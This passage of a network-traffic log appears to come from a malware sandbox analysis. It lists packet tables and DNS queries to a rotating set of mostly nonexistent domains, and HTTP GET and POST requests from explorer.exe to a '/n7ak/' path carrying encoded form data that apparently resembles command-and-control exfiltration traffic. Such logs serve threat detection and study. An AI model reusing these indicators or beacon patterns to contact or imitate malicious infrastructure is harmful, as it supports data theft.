Sep 22, 2024 17:27:13.412142038 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.412163019 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.455979109 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.456161022 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.501822948 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.501899004 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.551469088 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.551543951 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.628691912 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.628772020 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.718204021 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.718302965 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.783868074 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.783988953 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.823895931 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.824084044 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:27:13.837012053 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.837027073 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.838604927 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.838614941 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.838624001 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.841267109 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.841278076 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.841285944 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.841296911 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.841305017 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.841314077 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.842860937 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.842875957 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.843648911 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.845426083 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.845556974 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.845567942 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.849081993 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.851326942 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.852125883 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.852138042 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.853468895 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.853480101 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.853491068 CEST	80	49714	23.227.38.74	192.168.2.7
Sep 22, 2024 17:27:13.853548050 CEST	49714	80	192.168.2.7	23.227.38.74
Sep 22, 2024 17:28:14.309647083 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.316273928 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.318166018 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.318166018 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.323261023 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.323292017 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.323318958 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.323345900 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.323421955 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.323448896 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.323496103 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.323522091 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.323548079 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.323553085 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.323587894 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.324882984 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.327990055 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.328531027 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.328577995 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.328603983 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.328629971 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.328644991 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.328655958 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.328686953 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.328722954 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.332803011 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.369765997 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.376902103 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.425962925 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.429254055 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.477927923 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.484829903 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.533935070 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.540827990 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.589797974 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.589934111 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.637811899 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.644805908 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.693823099 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.693972111 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.742054939 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.742443085 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.748225927 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.748765945 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.753777027 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.753808975 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.753859997 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.753886938 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.753914118 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.753941059 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.753968000 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.753994942 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.754045010 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.754070997 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.754117012 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.754143953 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.754169941 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.754200935 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.754314899 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.754357100 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.754426956 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.754457951 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.754503012 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.754529953 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.833868980 CEST	49715	80	192.168.2.7	203.161.60.191
Sep 22, 2024 17:28:14.839440107 CEST	80	49715	203.161.60.191	192.168.2.7
Sep 22, 2024 17:28:14.841109037 CEST	49715	80	192.168.2.7	203.161.60.191

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 22, 2024 17:25:51.256093979 CEST	59484	53	192.168.2.7	1.1.1.1
Sep 22, 2024 17:25:51.267574072 CEST	53	59484	1.1.1.1	192.168.2.7
Sep 22, 2024 17:26:10.880997896 CEST	51761	53	192.168.2.7	1.1.1.1
Sep 22, 2024 17:26:10.891551018 CEST	53	51761	1.1.1.1	192.168.2.7
Sep 22, 2024 17:26:30.740703106 CEST	64864	53	192.168.2.7	1.1.1.1
Sep 22, 2024 17:26:30.750695944 CEST	53	64864	1.1.1.1	192.168.2.7
Sep 22, 2024 17:26:51.334228039 CEST	51576	53	192.168.2.7	1.1.1.1
Sep 22, 2024 17:26:51.366571903 CEST	53	51576	1.1.1.1	192.168.2.7
Sep 22, 2024 17:27:12.162921906 CEST	59884	53	192.168.2.7	1.1.1.1
Sep 22, 2024 17:27:12.209043980 CEST	53	59884	1.1.1.1	192.168.2.7
Sep 22, 2024 17:27:33.038193941 CEST	52085	53	192.168.2.7	1.1.1.1
Sep 22, 2024 17:27:33.048172951 CEST	53	52085	1.1.1.1	192.168.2.7
Sep 22, 2024 17:27:53.544715881 CEST	59944	53	192.168.2.7	1.1.1.1
Sep 22, 2024 17:27:53.580600977 CEST	53	59944	1.1.1.1	192.168.2.7
Sep 22, 2024 17:28:14.272828102 CEST	62462	53	192.168.2.7	1.1.1.1
Sep 22, 2024 17:28:14.307732105 CEST	53	62462	1.1.1.1	192.168.2.7
Sep 22, 2024 17:28:34.992857933 CEST	60434	53	192.168.2.7	1.1.1.1
Sep 22, 2024 17:28:35.019097090 CEST	53	60434	1.1.1.1	192.168.2.7
Sep 22, 2024 17:28:55.912898064 CEST	55421	53	192.168.2.7	1.1.1.1
Sep 22, 2024 17:28:55.925461054 CEST	53	55421	1.1.1.1	192.168.2.7
Sep 22, 2024 17:29:18.412283897 CEST	56618	53	192.168.2.7	1.1.1.1
Sep 22, 2024 17:29:18.429428101 CEST	53	56618	1.1.1.1	192.168.2.7
Sep 22, 2024 17:29:38.584283113 CEST	49367	53	192.168.2.7	1.1.1.1
Sep 22, 2024 17:29:39.031106949 CEST	53	49367	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 22, 2024 17:25:51.256093979 CEST	192.168.2.7	1.1.1.1	0xbc97	Standard query (0)	www.supremeajock.biz	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:26:10.880997896 CEST	192.168.2.7	1.1.1.1	0x1a23	Standard query (0)	www.1690.biz	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:26:30.740703106 CEST	192.168.2.7	1.1.1.1	0x84d2	Standard query (0)	www.ancientshadowguilt.space	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:26:51.334228039 CEST	192.168.2.7	1.1.1.1	0xede9	Standard query (0)	www.maximsboutique.com	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:27:12.162921906 CEST	192.168.2.7	1.1.1.1	0x835b	Standard query (0)	www.tuktukwines.com	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:27:33.038193941 CEST	192.168.2.7	1.1.1.1	0x242b	Standard query (0)	www.playdoapp.online	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:27:53.544715881 CEST	192.168.2.7	1.1.1.1	0xa4e0	Standard query (0)	www.taxuw.com	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:28:14.272828102 CEST	192.168.2.7	1.1.1.1	0xf5e9	Standard query (0)	www.jam-nins.com	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:28:34.992857933 CEST	192.168.2.7	1.1.1.1	0x547e	Standard query (0)	www.sdnaqianchuan.com	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:28:55.912898064 CEST	192.168.2.7	1.1.1.1	0xb80a	Standard query (0)	www.parkpeninsula.online	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:29:18.412283897 CEST	192.168.2.7	1.1.1.1	0x4ecc	Standard query (0)	www.395boulderbrookdr.com	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:29:38.584283113 CEST	192.168.2.7	1.1.1.1	0xf222	Standard query (0)	www.volkovastyu.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 22, 2024 17:25:51.267574072 CEST	1.1.1.1	192.168.2.7	0xbc97	Name error (3)	www.supremeajock.biz	none	none	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:26:10.891551018 CEST	1.1.1.1	192.168.2.7	0x1a23	Name error (3)	www.1690.biz	none	none	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:26:30.750695944 CEST	1.1.1.1	192.168.2.7	0x84d2	Name error (3)	www.ancientshadowguilt.space	none	none	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:26:51.366571903 CEST	1.1.1.1	192.168.2.7	0xede9	Name error (3)	www.maximsboutique.com	none	none	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:27:12.209043980 CEST	1.1.1.1	192.168.2.7	0x835b	No error (0)	www.tuktukwines.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 22, 2024 17:27:12.209043980 CEST	1.1.1.1	192.168.2.7	0x835b	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:27:33.048172951 CEST	1.1.1.1	192.168.2.7	0x242b	Name error (3)	www.playdoapp.online	none	none	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:27:53.580600977 CEST	1.1.1.1	192.168.2.7	0xa4e0	Name error (3)	www.taxuw.com	none	none	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:28:14.307732105 CEST	1.1.1.1	192.168.2.7	0xf5e9	No error (0)	www.jam-nins.com		203.161.60.191	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:28:35.019097090 CEST	1.1.1.1	192.168.2.7	0x547e	Name error (3)	www.sdnaqianchuan.com	none	none	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:28:55.925461054 CEST	1.1.1.1	192.168.2.7	0xb80a	Name error (3)	www.parkpeninsula.online	none	none	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:29:18.429428101 CEST	1.1.1.1	192.168.2.7	0x4ecc	Name error (3)	www.395boulderbrookdr.com	none	none	A (IP address)	IN (0x0001)	false
Sep 22, 2024 17:29:39.031106949 CEST	1.1.1.1	192.168.2.7	0xf222	No error (0)	www.volkovastyu.com	volkovastyu.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 22, 2024 17:29:39.031106949 CEST	1.1.1.1	192.168.2.7	0xf222	No error (0)	volkovastyu.com		78.46.88.140	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.tuktukwines.com

www.jam-nins.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49713	23.227.38.74	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 22, 2024 17:27:12.236576080 CEST	180	OUT	GET /n7ak/?OrT4vp=D48xOFEPf6J&nrCxNDk=X95XYDcr/0ovQl8dFDDB2DmtDdbecE+v1errdqyRv2syAHM7RuOPKheDNorHxKs8v8dmbSYlDw== HTTP/1.1 Host: www.tuktukwines.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 22, 2024 17:27:13.393188000 CEST	1236	IN	HTTP/1.1 403 Forbidden Date: Sun, 22 Sep 2024 15:27:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4514 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Sun, 22 Sep 2024 15:27:27 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I0FTsUAvKwEiZ3xh83g5%2Bv7bxN7oDtcOzSHFadiDKrLUdGKPZQGQ1Ifpo7oz9NVXw6uVe522O4MgjOch%2B9OFYWkh3OF1hnImFLmJLtOul4hBc8ERIJKi5BDDYp91oN3n7as01VA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=15.000105 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Download-Options: noopen Server: cloudflare CF-RAY: 8c7351583c871895-EWR Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta ht
Sep 22, 2024 17:27:13.393207073 CEST	1236	IN	Data Raw: 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d Data Ascii: tp-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><lin
Sep 22, 2024 17:27:13.393219948 CEST	448	IN	Data Raw: 6d 79 73 68 6f 70 69 66 79 2e 63 6f 6d 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 68 65 61 64 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d Data Ascii: myshopify.com</h2> </div>... /.header --> <div class="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-scr
Sep 22, 2024 17:27:13.397914886 CEST	1236	IN	Data Raw: 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 68 61 76 65 20 49 Data Ascii: lass="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-translate="blocked_why_detail">This website is using a security service to protect itself from online attacks. The actio
Sep 22, 2024 17:27:13.397929907 CEST	1191	IN	Data Raw: 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 Data Ascii: eparator sm:hidden">•</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
Sep 22, 2024 17:27:13.397960901 CEST	1236	IN	HTTP/1.1 403 Forbidden Date: Sun, 22 Sep 2024 15:27:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4514 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Sun, 22 Sep 2024 15:27:27 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I0FTsUAvKwEiZ3xh83g5%2Bv7bxN7oDtcOzSHFadiDKrLUdGKPZQGQ1Ifpo7oz9NVXw6uVe522O4MgjOch%2B9OFYWkh3OF1hnImFLmJLtOul4hBc8ERIJKi5BDDYp91oN3n7as01VA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=15.000105 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Download-Options: noopen Server: cloudflare CF-RAY: 8c7351583c871895-EWR Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta ht

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49714	23.227.38.74	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 22, 2024 17:27:13.399496078 CEST	12360	OUT	POST /n7ak/ HTTP/1.1 Host: www.tuktukwines.com Connection: close Content-Length: 133153 Cache-Control: no-cache Origin: http://www.tuktukwines.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.tuktukwines.com/n7ak/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6e 72 43 78 4e 44 6b 3d 66 66 31 74 47 6c 55 67 7e 69 6c 34 62 48 4d 70 66 7a 53 41 6e 31 4b 57 58 4e 7a 38 54 30 76 76 73 36 36 4c 59 49 32 76 68 7a 59 57 48 6a 59 78 44 4d 6a 64 4d 33 66 59 59 6f 28 59 7e 65 67 66 75 36 78 39 5a 42 6f 45 48 4b 55 69 62 44 28 63 57 41 63 4f 52 67 4e 67 32 4d 38 33 39 39 4b 50 44 33 7e 4f 62 48 6b 42 70 75 49 56 79 30 4a 4f 4c 61 72 4d 7e 78 48 44 71 37 61 38 45 32 6f 33 44 4a 46 78 48 79 30 76 63 4f 52 72 7a 72 6d 63 37 50 45 66 70 53 65 2d 61 48 63 4e 44 72 6a 39 70 38 45 41 4c 33 73 50 32 69 4a 4e 67 4f 61 59 36 4e 7e 33 36 6b 64 75 52 55 43 39 42 66 61 43 72 62 38 67 36 72 56 73 42 69 62 71 37 61 6d 4d 70 4c 7e 64 6b 37 37 77 45 54 68 44 33 6a 62 58 35 43 46 4c 6d 6a 62 79 36 6a 4b 63 6b 6b 31 32 71 70 34 4a 69 51 59 6e 4e 6d 30 69 59 43 43 52 36 43 69 67 62 4c 42 30 47 55 36 66 73 76 74 61 5a 58 7a 41 79 59 5a 31 63 54 4d 64 34 66 50 49 30 41 48 51 33 44 4f 54 70 77 48 47 74 31 55 56 32 73 7a 31 48 78 57 6c 42 4f 75 46 43 6e 4d 70 39 75 36 55 48 72 41 77 7a 4b [TRUNCATED] Data Ascii: nrCxNDk=ff1tGlUg~il4bHMpfzSAn1KWXNz8T0vvs66LYI2vhzYWHjYxDMjdM3fYYo(Y~egfu6x9ZBoEHKUibD(cWAcORgNg2M8399KPD3~ObHkBpuIVy0JOLarM~xHDq7a8E2o3DJFxHy0vcORrzrmc7PEfpSe-aHcNDrj9p8EAL3sP2iJNgOaY6N~36kduRUC9BfaCrb8g6rVsBibq7amMpL~dk77wEThD3jbX5CFLmjby6jKckk12qp4JiQYnNm0iYCCR6CigbLB0GU6fsvtaZXzAyYZ1cTMd4fPI0AHQ3DOTpwHGt1UV2sz1HxWlBOuFCnMp9u6UHrAwzK9GDI7NClJCLfIyNhQYUjmYkWdo(mcyEaaxTZXdj6i7vXFpicHtr1tVAVBtqsl2AMPKtmfug2wZ0lvLdpjFwt2L0wdtFXXR3ShegNkL71oLv8y5dQd-2F33NgK-hr3vf820U9IroJZxeLK-7EFntbDs~Npoh-49kzrQDi1rghPfTRE5IHeABsvmTWBjovzQWttN9HpSYcJnL3BE38~CSqG4DoOHiUQXbe4M5jwVEElCk3UGUT0_(mfg8oPIQcljQ9zdgz6qfp1Gcizmve6r(DOgY5jzU6xBXRknOD8bXnmWkn0OISdMsC78KTq5AqzmDVnyxsrCjTatJFh7NOWcyBS4r2rNtlTVWIXtbwWM3NnZfYjN8PIdQA1qkv66VS4J(qDAvbTsRbBvFqjS0dQeZdSRNU9DCQN4giu2X86Fa53zfJbRAaLoe8aipBIxJYv98pVOL8qbWrSw6i0uqj909vM66kV-Y0HaOYWTd-tot9saExuTT51